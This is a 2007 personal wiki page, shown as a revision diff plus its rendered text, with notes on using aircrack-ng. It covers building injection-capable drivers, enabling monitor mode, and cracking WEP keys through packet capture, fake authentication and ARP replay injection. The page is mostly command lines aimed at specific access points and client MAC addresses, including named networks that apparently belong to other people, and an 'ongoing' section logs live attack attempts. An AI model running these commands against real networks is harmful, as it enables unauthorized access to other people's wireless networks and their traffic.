Aircrack: Difference between revisions

From Halfface
Jump to navigation Jump to search
No edit summary
No edit summary
Line 37: Line 37:
  modprobe ath_pci
  modprobe ath_pci


==operation==
==Tweak network driver==
 
Enable monitor mode and injection.
Load and tweaked driver.
*ralink
  ifconfig rausb0 up
  ifconfig rausb0 up
  iwconfig rausb0 mode monitor
  iwconfig rausb0 mode monitor
Line 46: Line 46:
Change speed on  network card.
Change speed on  network card.
  iwconfig rausb0 rate 1M
  iwconfig rausb0 rate 1M
*atheros
ifconfig ath0 down
wlanconfig ath0 destroy
wlanconfig ath create wlandev wifi0 wlanmode monitor [sta|adhoc|ap|monitor|wds|ahdemo]
==Crack wep key==
Start kismet and capture the following data.
Name    : default
ESSID  : default
BSSID  : 00:13:46:4B:37:DE
Channel : 6
clientmac: 00:16:CE:4C:B7:53
Edit this file to make kismet start.
*/etc/kismet/kismet.conf
source=iwl4965,wlan0,addme
source=rt73,wlan1,wlan1
source=rt73,rausb0,rausb0
source=rt2500,rausb0,RT73


Write comunication from ap.
Write comunication from ap.
Line 55: Line 76:
Crack web key.
Crack web key.
  aircrack-ng -z -b 00:90:4C:7E:00:6E wifi-network1*.cap
  aircrack-ng -z -b 00:90:4C:7E:00:6E wifi-network1*.cap
==kismet==
kismet
/etc/kismet/kismet.conf
source=iwl4965,wlan0,addme
source=rt73,wlan1,wlan1
source=rt73,rausb0,rausb0
source=rt2500,rausb0,RT73


==Information==
==Information==
Line 88: Line 99:
  iwpriv rausb0 rfmontx 1
  iwpriv rausb0 rfmontx 1


==atheros==
wlanconfig ath create wlandev wifi0 wlanmode monitor
ifconfig ath0 down
wlanconfig ath0 destroy
wlanconfig ath create wlandev wifi0 wlanmode [sta|adhoc|ap|monitor|wds|ahdemo]


==ongoing==
==ongoing==
00:40:96:a6:ca:1b
00:40:96:a6:ca:1c
06:40:96:A6:CA:1C
Name    : default
ESSID  : default
BSSID  : 00:13:46:4B:37:DE
Channel : 6
00:16:CE:4C:B7:53
   
   
  airmon-ng stop ath0
  airmon-ng stop ath0

Revision as of 00:09, 12 December 2007

Install aircrack-ng

yum -y install aircrack-ng

For compiling injection drivers.

yum -y install kernel-headers

Optionally install kismet.

yum -y install kismet

compile injection enabled drivers

rt73

wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-2.0.1.tar.bz2
tar -xjf rt73-k2wrlz-2.0.1.tar.bz2
cd rt73-k2wrlz-2.0.1/Module
make
make install
modprobe rt73

rt61

wget http://rt2x00.serialmonkey.com/rt61-cvs-daily.tar.gz
tar xvfz rt61-cvs-daily.tar.gz
cd rt61-cvs-*
cd Module
make
make install

madwifi-ng

svn -r 2834 checkout http://svn.madwifi.org/madwifi/trunk/ madwifi-ng2834
wget http://patches.aircrack-ng.org/madwifi-ng-r2277.patch
cd madwifi-ng2834
patch -Np1 -i ../madwifi-ng-r2277.patch
./scripts/madwifi-unload
make
make install
depmod -ae
modprobe ath_pci

Tweak network driver

Enable monitor mode and injection.

  • ralink
ifconfig rausb0 up
iwconfig rausb0 mode monitor
iwpriv rausb0 rfmontx 1

Change speed on network card.

iwconfig rausb0 rate 1M
  • atheros
ifconfig ath0 down
wlanconfig ath0 destroy
wlanconfig ath create wlandev wifi0 wlanmode monitor [sta|adhoc|ap|monitor|wds|ahdemo]

Crack wep key

Start kismet and capture the following data.

Name    : default
ESSID   : default
BSSID   : 00:13:46:4B:37:DE
Channel : 6
clientmac: 00:16:CE:4C:B7:53

Edit this file to make kismet start.

  • /etc/kismet/kismet.conf
source=iwl4965,wlan0,addme
source=rt73,wlan1,wlan1
source=rt73,rausb0,rausb0
source=rt2500,rausb0,RT73

Write comunication from ap.

airodump-ng --write wifi-network1 --channel 11 --bssid 00:90:4C:7E:00:6E rausb0

Generate network comunication.

aireplay-ng --arpreplay -b 00:90:4C:7E:00:6E -h 00:1B:11:BC:D5:1B rausb0

Crack web key.

aircrack-ng -z -b 00:90:4C:7E:00:6E wifi-network1*.cap

Information

netgear DWL-G122 
mac:	00:1B:11:BC:D5:1B
Name    : B2_private_49
SSID    : B2_private_49
BSSID   : 00:01:38:9A:91:EC
Channel : 11
Name    : vgrox
SSID    : vgrox
BSSID   : 00:13:46:E1:2F:4F
Channel : 9
client:	00:13:46:E1:2F:4F
airodump-ng --ivs --write dump2 --channel 9 --bssid 00:13:46:E1:2F:4F rausb0
ifconfig rausb0 up
iwconfig rausb0 mode monitor
iwpriv rausb0 rfmontx 1


ongoing

airmon-ng stop ath0
airmon-ng start wifi0 6
capture iv:s. 
airodump-ng -c 6 --bssid 00:13:46:4B:37:DE -w airdump-ng-defaul ath0
fake authentication -e name -a -a access point MAC address -h 
aireplay-ng -1 0 -e default -a 00:14:6C:7E:40:80 -h 00:40:96:a6:ca:1c ath0
aireplay-ng -1 0 -e default -a 00:13:46:4B:37:DE -h 06:40:96:A6:CA:1C ath0
aireplay-ng -3 -b 00:13:46:4B:37:DE -h 00:16:CE:4C:B7:53 ath0